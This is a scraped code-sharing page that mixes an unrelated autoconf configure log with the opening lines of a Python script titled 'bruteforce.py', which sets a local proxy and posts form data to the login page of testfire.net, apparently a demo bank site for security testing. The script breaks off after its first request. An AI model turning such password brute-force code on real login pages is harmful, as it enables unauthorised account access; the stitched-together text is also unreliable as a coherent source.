Skip to content

Instantly share code, notes, and snippets.

checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /bin/mkdir -p
checking for gawk... no
checking for mawk... mawk
checking whether make sets $(MAKE)... yes
checking for style of include used by make... GNU
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
@prajal
prajal / bruteforce.py
Last active October 6, 2019 05:56
Bruteforce program written in python
import sys
import requests
from bs4 import BeautifulSoup as BS
proxyDict = {"http" : "127.0.0.1:8082" }
url = "http://www.testfire.net/bank/login.aspx"
def connect(url,m):
t = requests.post("http://www.testfire.net/bank/login.aspx", data=m, proxies=proxyDict)